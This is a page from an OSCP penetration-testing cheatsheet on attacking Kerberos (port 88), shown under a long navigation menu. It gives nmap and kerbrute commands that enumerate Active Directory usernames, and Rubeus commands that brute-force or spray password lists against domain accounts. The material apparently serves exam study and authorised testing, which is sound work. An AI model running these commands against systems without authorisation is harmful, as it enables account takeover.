OSCP Cheatsheet
  • Reference List
  • Basic
  • Methodology
    • Basic Scans
    • Service Enumeration
      • TCP: HTTP(S) - 80 / 443
      • TCP: SMB - 139 / 445
      • TCP: FTP - 21
      • TCP/UDP: DNS - 53
      • TCP: SSH - 22
      • TCP/UDP: LDAP - 389 / 636 / 3268
      • TCP/UDP: Kerberos - 88
      • UDP: SNMP - 161
      • TCP: SMTP - 25
      • TCP: RDP - 3389
      • TCP: RPC - 135 / 593
      • TCP: Evil-WinRM - 5985 / 5986
      • TCP: MYSQL - 3306
      • TCP: MSSQL - 1433
      • TCP: Confluence - 8090
    • Extras
  • File Transfer
  • KeePass Database
  • Shells
  • Enumeration
    • Linux
    • Windows
    • Git
  • Privilege Escalation
    • Linux
      • Abusing Cron Jobs
      • Abusing Password Authentication
      • Abusing Setuid Binaries and Capabilities
      • Abusing Sudo
      • Exploits
    • Windows
      • Service Binary Hijacking
      • DLL Hijacking
      • Unquoted Service Paths
      • Scheduled Tasks
      • Exploits
  • Port Forwarding
    • Linux
    • Windows
  • Attacks
    • Public Exploits
    • User Creation
    • Password Cracking
      • Custom Rules
      • Custom Password List
    • Phishing
    • SQLi
  • Active Directory
    • Enumeration
    • Attack
    • Lateral Movement
    • Persistence
Powered by GitBook
On this page
  • Nmap
  • Kerbrute - Run On Attacker Machine
  • Rubeus - Run On Target Machine
  1. Methodology
  2. Service Enumeration

TCP/UDP: Kerberos - 88

PreviousTCP/UDP: LDAP - 389 / 636 / 3268NextUDP: SNMP - 161

Last updated 24 days ago

Nmap

nmap -p 88 --script=krb5-enum-users --script-args krb5-enum-users.realm=<Domain Name>[,userdb=<Username List>] <Target IP Address>

Kerbrute - Run On Attacker Machine

NOTE: Download

./kerbrute userenum <Username List> --dc <Target IP Address> --domain <Domain Name>

Rubeus - Run On Target Machine

NOTE: Download

The following command run against with a list of users

.\Rubeus.exe brute /users:<Username List> /passwords:<Password list> /domain:<Domain>

The following command check all domain users against the password list

.\Rubeus.exe brute /passwords:<Password list>
here
here